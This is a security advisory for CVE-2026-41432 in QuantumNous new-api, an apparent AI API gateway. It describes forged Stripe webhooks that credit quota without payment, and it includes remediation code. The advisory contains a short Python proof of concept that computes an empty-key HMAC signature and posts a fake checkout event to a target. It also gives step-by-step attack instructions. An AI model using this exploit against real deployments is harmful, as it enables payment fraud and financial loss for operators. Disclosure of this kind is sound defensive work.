QuantumNous new-api CVE-2026-41432
HIGHSeverity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
Lifecycle Timeline
4DescriptionGitHub Advisory
Summary
A critical vulnerability exists in the Stripe webhook handler that allows an unauthenticated attacker to forge webhook events and credit arbitrary quota to their account without making any payment. The vulnerability stems from three compounding flaws:
- The Stripe webhook endpoint does not reject requests when
StripeWebhookSecretis empty (the default). - When the HMAC secret is empty, any attacker can compute valid webhook signatures, effectively bypassing signature verification entirely.
- The
Rechargefunction does not validate that the order'sPaymentMethodmatches the callback source, enabling cross-gateway exploitation - an order created via any payment method (e.g., Epay) can be fulfilled through a forged Stripe webhook.
Affected Components
controller/topup_stripe.go-StripeWebhook(),sessionCompleted()model/topup.go-Recharge(),RechargeCreem(),RechargeWaffo()controller/topup.go-EpayNotify()controller/topup_creem.go-CreemAdaptor.RequestPay()(missingPaymentMethodfield)router/api-router.go- webhook route registered without any guard
CWE Classification
- CWE-345: Insufficient Verification of Data Authenticity
- CWE-1188: Initialization with an Insecure Default (empty webhook secret)
- CWE-863: Incorrect Authorization (cross-gateway order fulfillment)
Vulnerability Details
Flaw 1: Empty Webhook Secret Bypasses Signature Verification
The StripeWebhookSecret setting defaults to an empty string "". The Stripe Go SDK (webhook.ConstructEventWithOptions) does not reject empty secrets - it computes HMAC-SHA256 with an empty key, producing a deterministic and publicly computable signature.
Vulnerable code (controller/topup_stripe.go):
func StripeWebhook(c *gin.Context) {
// No check for empty StripeWebhookSecret
payload, _ := io.ReadAll(c.Request.Body)
signature := c.GetHeader("Stripe-Signature")
endpointSecret := setting.StripeWebhookSecret // defaults to ""
event, err := webhook.ConstructEventWithOptions(payload, signature, endpointSecret, ...)
// When secret is "", attacker can compute valid HMAC with the same empty key
}The webhook route is unconditionally registered with no authentication middleware and no rate limiting:
apiRouter.POST("/stripe/webhook", controller.StripeWebhook)Flaw 2: Missing payment_status Verification
The sessionCompleted handler only checks status "complete" but does not verify payment_status "paid". Stripe's checkout.session.completed event can fire with payment_status = "unpaid" for delayed payment methods (bank transfer, SEPA, Boleto, etc.) or payment_status = "no_payment_required" for 100% discount coupons.
Additionally, checkout.session.async_payment_succeeded and checkout.session.async_payment_failed events are not handled, so delayed payments that ultimately fail are never rolled back.
Flaw 3: Cross-Gateway Order Fulfillment (No PaymentMethod Validation)
The model.Recharge() function (called by the Stripe webhook) looks up orders solely by trade_no and does not validate that the order's PaymentMethod is "stripe":
func Recharge(referenceId string, customerId string) (err error) {
// Finds ANY pending order by trade_no, regardless of PaymentMethod
tx.Where("trade_no = ?", referenceId).First(topUp)
if topUp.Status != "pending" { return }
// Credits quota without checking topUp.PaymentMethod
quota = topUp.Money * QuotaPerUnit
tx.Model(&User{}).Update("quota", gorm.Expr("quota + ?", quota))
}This allows an attacker to create orders through any configured payment gateway (Epay, Creem, Waffo) and then complete them via a forged Stripe webhook - even if Stripe itself was never configured.
Attack Scenario
Prerequisites: Any payment method is configured (e.g., Epay) + StripeWebhookSecret is empty (default).
- Attacker registers a user account.
- Attacker calls
POST /api/user/payto create an Epay top-up order (e.g.,amount=10000). The order is stored withstatus=pending. - Attacker queries
GET /api/user/topup/selfto retrieve thetrade_noof the pending order. - Attacker computes
HMAC-SHA256with an empty key over a craftedcheckout.session.completedpayload containing the stolentrade_noasclient_reference_id. - Attacker sends
POST /api/stripe/webhookwith the forged payload and signature header. - The server verifies the signature (passes because the secret is empty), calls
Recharge(), which finds the Epay order bytrade_no, marks it assuccess, and credits the full quota. - Attacker repeats steps 2-6 indefinitely for unlimited credits.
Proof of concept (pseudocode):
import hmac, hashlib, time, json, requests
timestamp = int(time.time())
payload = json.dumps({
"type": "checkout.session.completed",
"data": {
"object": {
"client_reference_id": "<trade_no from step 3>",
"status": "complete",
"payment_status": "paid",
"customer": "cus_fake",
"amount_total": "0",
"currency": "usd"
}
}
})
# Empty secret = publicly computable signature
sig = hmac.new(b"", f"{timestamp}.{payload}".encode(), hashlib.sha256).hexdigest()
header = f"t={timestamp},v1={sig}"
requests.post("https://target/api/stripe/webhook",
data=payload,
headers={"Stripe-Signature": header, "Content-Type": "application/json"})Remediation
Fix 1: Reject webhooks when secret is empty
func StripeWebhook(c *gin.Context) {
if setting.StripeWebhookSecret == "" {
c.AbortWithStatus(http.StatusForbidden)
return
}
// ... existing logic
}Fix 2: Verify payment_status and handle async payment events
func sessionCompleted(event stripe.Event) {
// ... existing status check ...
paymentStatus := event.GetObjectValue("payment_status")
if paymentStatus != "paid" {
return // Wait for async_payment_succeeded event
}
fulfillOrder(event, referenceId, customerId)
}Add handlers for checkout.session.async_payment_succeeded and checkout.session.async_payment_failed.
Fix 3: Validate PaymentMethod in all recharge functions
// In model.Recharge (Stripe):
if topUp.PaymentMethod != "stripe" {
return ErrPaymentMethodMismatch
}
// In model.RechargeCreem:
if topUp.PaymentMethod != "creem" {
return ErrPaymentMethodMismatch
}
// In model.RechargeWaffo:
if topUp.PaymentMethod != "waffo" {
return ErrPaymentMethodMismatch
}
// In controller.EpayNotify:
if topUp.PaymentMethod == "stripe" || topUp.PaymentMethod == "creem" || topUp.PaymentMethod == "waffo" {
return // reject cross-gateway fulfillment
}Additional fix: Set PaymentMethod on Creem order creation
The Creem order creation was missing the PaymentMethod field entirely:
topUp := &model.TopUp{
// ...
PaymentMethod: "creem", // was missing
}Patched Versions
- v0.12.10 - includes all three fixes described above.
All users are strongly encouraged to upgrade immediately.
Workaround (for users unable to upgrade immediately)
If users cannot upgrade to v0.12.10 right away, apply all of the following mitigations:
- Set
StripeWebhookSecretto any non-empty value. Go to the admin panel → Payment → Stripe, and set the Webhook Signing Secret to any random string (e.g.,whsec_placeholder_do_not_leave_empty). It does not need to be a real Stripe secret - any non-empty value will prevent the empty-key HMAC forgery. This is the single most important step - it closes the primary attack vector. If Stripe payments are used in production, replace with the real secret from the project's Stripe Dashboard → Webhooks to ensure legitimate webhooks continue to work. - If Stripe is not in use, block the webhook endpoint. If users have not configured Stripe payments, use a reverse proxy (Nginx, Caddy, etc.) to deny access to
/api/stripe/webhook:
location = /api/stripe/webhook {
return 403;
}> Note: The workaround only mitigates Flaw 1 (empty secret bypass). Flaws 2 (missing payment_status check) and 3 (cross-gateway fulfillment) are only fully addressed in v0.12.10. Upgrading is the only complete fix.
Impact
- Financial fraud: Attacker obtains unlimited API quota without payment.
- Operator financial loss: Fraudulent quota is consumed against upstream AI providers (OpenAI, Anthropic, Google, etc.), charged to the operator.
- Silent exploitation: Fraudulent top-ups appear as normal successful transactions in system logs, making detection difficult.
- Wide exposure: The default insecure configuration means virtually all deployments with any payment method enabled are vulnerable.
Timeline
- 2025-04-15: Vulnerability reported by @ChangeYu0229
- 2025-04-15: Vulnerability confirmed and root cause analysis completed
- 2025-04-15: Fix developed and applied
- 2025-04-15: Patched in v0.12.10
Resources
AnalysisAI
Attackers can forge Stripe webhook events to obtain unlimited API quota without payment in QuantumNous new-api (Go package github.com/QuantumNous/new-api). The vulnerability exploits an empty default webhook secret that allows HMAC signature forgery, missing payment status validation, and cross-gateway order fulfillment logic that permits completing orders created through any payment provider (Epay, Creem, Waffo) via fabricated Stripe callbacks. Virtually all deployments with any payment method enabled are vulnerable in default configuration. Fixed in version 0.12.10. No public exploit code identified at time of analysis, but the detailed advisory includes a proof-of-concept pseudocode demonstrating the attack chain. CVSS 7.1 (High) with low attack complexity and low privileges required indicates practical exploitation risk for deployed instances.
Technical ContextAI
This vulnerability affects QuantumNous new-api, a Go-based API gateway/proxy for AI services (OpenAI, Anthropic, Google AI) with built-in payment processing. The flaw resides in the Stripe webhook handler integration (controller/topup_stripe.go) which implements payment callback verification using the Stripe Go SDK's webhook.ConstructEventWithOptions function. The core issue stems from CWE-345 (Insufficient Verification of Data Authenticity) combined with CWE-1188 (Insecure Default Configuration). When StripeWebhookSecret is empty (the default), the HMAC-SHA256 signature verification becomes deterministic and publicly computable since HMAC with an empty key produces predictable outputs. The vulnerability is compounded by missing payment_status field validation (Stripe checkout.session.completed events can fire with payment_status='unpaid' for delayed payment methods) and CWE-863 (Incorrect Authorization) in the model.Recharge() function which validates orders solely by trade_no without verifying the PaymentMethod field matches the callback source. This creates a cross-gateway exploitation primitive where orders created through competing payment processors can be fulfilled via forged Stripe webhooks. The affected package is distributed as pkg:go/github.com_quantumnous_new-api with the webhook route registered at /api/stripe/webhook without authentication middleware or rate limiting.
RemediationAI
Upgrade immediately to QuantumNous new-api v0.12.10 or later, available at https://github.com/QuantumNous/new-api/releases/tag/v0.12.10. This release includes all three required fixes: empty webhook secret rejection, payment_status validation with async payment event handlers, and PaymentMethod validation in all recharge functions. For operators unable to upgrade immediately, apply the following compensating controls with understanding of their limitations: (1) Set StripeWebhookSecret to any non-empty random string via admin panel → Payment → Stripe (example: 'whsec_placeholder_do_not_leave_empty'). This is the single most critical mitigation as it prevents empty-key HMAC forgery. If using Stripe in production, obtain the real webhook signing secret from Stripe Dashboard → Webhooks (https://dashboard.stripe.com/webhooks) to maintain legitimate webhook processing. (2) If Stripe is not configured for production use, block the webhook endpoint entirely using reverse proxy rules - example for Nginx: 'location = /api/stripe/webhook { return 403; }'. IMPORTANT LIMITATION: These workarounds only mitigate Flaw 1 (signature bypass). Flaws 2 (missing payment_status validation allowing unpaid order fulfillment) and Flaw 3 (cross-gateway order completion) remain exploitable until v0.12.10 is deployed. The workarounds reduce but do not eliminate risk. Operators should treat temporary mitigations as bridge measures only and prioritize full upgrade to patched version.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-xff3-5c9p-2mr4